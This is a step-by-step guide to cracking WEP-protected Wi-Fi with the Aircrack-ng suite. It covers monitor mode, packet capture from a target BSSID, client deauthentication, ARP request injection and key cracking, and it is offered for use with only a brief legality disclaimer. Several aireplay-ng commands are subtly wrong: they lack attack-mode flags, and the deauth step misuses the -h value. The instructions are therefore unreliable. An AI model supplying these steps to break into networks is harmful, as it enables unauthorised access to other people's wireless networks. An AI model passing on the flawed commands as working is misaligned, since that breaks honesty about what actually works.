WEP Attack: Packet Injection Guide

TL;DR

This guide explains how to inject packets during a WEP attack using tools like Aircrack-ng. It’s for educational purposes only – attacking networks without permission is illegal.

Prerequisites

• A wireless network interface capable of monitor mode and packet injection (check with iwconfig).
• The Aircrack-ng suite installed.
• Root privileges.

Steps

1. Put your Wireless Interface into Monitor Mode

   First, identify your wireless interface name (e.g., wlan0). Then use airmon-ng start <interface_name> to put it into monitor mode. This creates a new virtual interface (e.g., mon0).

   sudo airmon-ng start wlan0

2. Find the Target Network

   Use airodump-ng <monitor_interface> to scan for nearby wireless networks. Identify the BSSID (MAC address) of your target network.

   sudo airodump-ng mon0

3. Capture Packets

   Start capturing packets from the target network using airodump-ng -w <output_file> --bssid <target_BSSID> <monitor_interface>. This saves captured data to files.

   sudo airodump-ng -w capture --bssid 00:11:22:33:44:55 mon0

4. Deauthenticate a Client

   To generate traffic, you need to deauthenticate a connected client. Use aireplay-ng -a <target_BSSID> -c <client_MAC> -h 00:11:22:33:44:55 mon0. Replace client_MAC with the MAC address of a connected client (found in the airodump-ng output).

   sudo aireplay-ng -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 mon0

5. Inject Packets (ARP Request Injection)

   This is the core of the attack. We’ll inject ARP request packets to flood the network and capture enough IVs for cracking.

   • Use aireplay-ng -a <target_BSSID> -h 00:11:22:33:44:55 mon0 to inject ARP requests. This sends spoofed ARP packets, forcing the target access point to retransmit data and generate IVs.

   sudo aireplay-ng -a 00:11:22:33:44:55 -h 00:11:22:33:44:55 mon0

6. Check for Sufficient IVs

   Monitor the airodump-ng output. You need to collect enough IVs (Initialization Vectors) – typically several thousand – before attempting to crack the WEP key.

7. Crack the WEP Key

   Once you have sufficient IVs, use aircrack-ng <output_file>.cap to attempt to crack the WEP key. This process can take time depending on the number of IVs collected and the network’s configuration.

   sudo aircrack-ng capture*.cap

8. Stop Monitor Mode

   After finishing, stop monitor mode using airmon-ng stop <monitor_interface>.

   sudo airmon-ng stop mon0

Important Notes

• Legality: Attacking networks without permission is illegal. This guide is for educational purposes only.
• Hardware Compatibility: Not all wireless interfaces support monitor mode and packet injection.
• Network Configuration: Some WEP implementations are more resistant to attacks than others.